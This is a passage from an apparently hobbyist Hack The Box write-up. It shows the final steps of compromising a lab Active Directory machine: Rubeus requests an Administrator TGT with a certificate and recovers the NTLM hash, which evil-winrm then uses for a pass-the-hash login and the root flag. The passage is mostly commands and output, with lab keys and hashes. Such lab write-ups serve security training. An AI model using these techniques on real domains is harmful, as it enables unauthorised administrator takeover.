  Flags                    :  name_canonicalize, pre_authent, initial, renewable
  KeyType                  :  rc4_hmac
  Base64(key)              :  xXtPDJD44N/LDDFDSZt7lQ==
  ASREP (key)              :  25425F5D4ED1042512BFC036C6A94862

There are two ways (that I know of) to obtain the password hash: using a ccache...

GitHub - Hackplayers/evil-winrm: The ultimate WinRM shell for hacking/pentesting

...or generating it from Rubeus itself; let me use the simplest method.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\downloads> ./Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.2

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'
[*] Using domain controller: fe80::a477:436e:5730:3595%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGSDCCBkSgAwIBBaEDAgEWooIFXjCCBVphggVWMIIFUqADAgEFoQwbClNFUVVFTC5IVEKiHzAdoAMC
      AQKhFjAUGwZrcmJ0Z3QbCnNlcXVlbC5odGKjggUaMIIFFqADAgESoQMCAQKiggUIBIIFBBbDT2EbXfI1
[...]
      BwMFAADhAAClERgPMjAyMzA0MDYwNjE0MTNaphEYDzIwMjMwNDA2MTYxNDEzWqcRGA8yMDIzMDQxMzA2
      MTQxM1qoDBsKU0VRVUVMLkhUQqkfMB2gAwIBAqEWMBQbBmtyYnRndBsKc2VxdWVsLmh0Yg==

  ServiceName              :  krbtgt/sequel.htb
  ServiceRealm             :  SEQUEL.HTB
  UserName                 :  Administrator
  UserRealm                :  SEQUEL.HTB
  StartTime                :  4/5/2023 11:14:13 PM
  EndTime                  :  4/6/2023 9:14:13 AM
  RenewTill                :  4/12/2023 11:14:13 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable
  KeyType                  :  rc4_hmac
  Base64(key)              :  xiXbj5e7f3J3Xv2+WDcN7A==
  ASREP (key)              :  C877552CA622B1DC65D65CC9007546E9

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : A52F78E4C751E5F5E17E1E9F3E58F4EE

And we run straight to the root flag without delay, once again exploiting the potential of Evil-WinRM.

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox/--==## DONE ##==--]
└─$ evil-winrm -i 10.10.11.202 -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
b4c008685abf917ffbf974fddb917a8a
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

And once again... that's all folks. I sweated for a few days, but in the end I managed to overcome every obstacle (even the most trivial ones; next time, look around before heading down the most rugged routes). For the moment, goodbye, but I'll be waiting for you at the next BOX. Happy hacking everyone!